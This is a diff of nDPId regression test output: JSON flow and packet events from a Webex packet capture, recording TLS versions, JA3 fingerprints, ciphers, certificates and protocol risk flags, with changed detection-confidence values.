+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 
or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
(v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570718801,"flow_last_seen":1444570718801,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1444570718801,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1444570718801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718801,"pkt":"ABoRAAACABoRAAABCABFAAAk4zFAAEARKYMKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1444570718921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718921,"pkt":"ABoRAAACABoRAAABCABFAAAkA95AABARONc+beWeCggAASMoyjwAEESbAgAAAAC4nQE="} 
@@ -307,7 +307,7 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 